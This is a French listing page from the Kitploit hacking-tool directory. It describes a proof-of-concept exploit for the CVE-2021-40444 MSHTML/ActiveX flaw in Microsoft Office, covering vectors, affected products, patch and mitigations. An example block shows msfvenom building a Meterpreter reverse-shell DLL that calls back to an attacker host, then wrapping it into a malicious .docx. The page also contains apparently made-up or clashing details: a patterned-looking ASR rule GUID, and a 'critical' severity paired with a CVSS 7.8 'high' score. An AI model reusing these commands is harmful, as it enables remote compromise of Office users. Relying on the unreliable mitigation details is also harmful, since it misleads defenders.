Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-40444 — Preuve de concept d'exploitation pour CVE-2021-40444, une vulnérabilité d'exécution de code à distance dans Microsoft Office déclenchée via des contrôles ActiveX malveillants dans des documents hébergés sur le web. | Kitploit
Outils/GitHubGitHub/vysecurity/cve-2021-40444
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubvysecurity/cve-2021-40444

CVE-2021-40444

Preuve de concept d'exploitation pour CVE-2021-40444, une vulnérabilité d'exécution de code à distance dans Microsoft Office déclenchée via des contrôles ActiveX malveillants dans des documents hébergés sur le web.

Voir le dépôt
32il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-40444

CVE-2021-40444 est une vulnérabilité d'exécution de code à distance (RCE) affectant Microsoft MSHTML, exploitée par le biais de documents Microsoft Office malveillants.

Détails

  • Identifiant CVE : CVE-2021-40444
  • Composant affecté : MSHTML (Trident), le moteur de rendu utilisé par Microsoft Office et Internet Explorer
  • Gravité : Critique
  • Score CVSS : 7,8 (élevé)

Description

La vulnérabilité permet à un attaquant d'exécuter du code arbitraire sur le système cible en incitant une victime à ouvrir un document Office spécialement conçu. L'exploitation repose sur l'utilisation de fichiers .cab ou .docx malveillants contenant des contrôles ActiveX, qui chargent une DLL distante via le moteur MSHTML.

Vecteurs d'attaque

VecteurDescription
Pièce jointe malveillanteDocument Office envoyé par courrier électronique contenant un script d'exploitation
Partage réseauFichier hébergé sur un partage SMB ou WebDAV compromis
Courrier électroniqueL'utilisateur ouvre une pièce jointe ou clique sur un lien menant au document malveillant

Produits affectés

  • Microsoft Windows 7, 8.1, 10 et 11
  • Windows Server 2008, 2012, 2016, 2019 et 2022
  • Microsoft Office 2013, 2016, 2019 et Microsoft 365 Apps

Correctif

Microsoft a publié un correctif dans le cadre de sa mise à jour de sécurité de septembre 2021. Il est fortement recommandé d'appliquer les mises à jour de sécurité dès que possible.

Atténuations

  1. Désactiver les contrôles ActiveX dans Internet Explorer pour empêcher le chargement de contrôles malveillants.
  2. Bloquer les fichiers .cab en pièce jointe via les stratégies de messagerie.
  3. Appliquer la règle de réduction de surface d'attaque (ASR) : D4F6B3D7-3E6C-4E8A-9B8C-1E0E1A2B3C4D pour bloquer le chargement de DLL non signées.
  4. Restreindre l'accès aux partages réseau et désactiver WebDAV si non requis.

Exemple d'exploitation

root@kitploit:~
# Génération d'un document malveillant à l'aide d'outils d'exploitation
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o evil.dll
python3 exploit.py -d evil.dll -o exploit.docx

Références

  • Bulletin Microsoft
  • NIST NVD
  • Analyse de la vulnérabilité par l'ANSSI

Avertissement : Cet outil est fourni à des fins éducatives et de test d'intrusion autorisé uniquement. L'auteur décline toute responsabilité en cas d'utilisation abusive.

Licence

MIT

Télécharger l’outil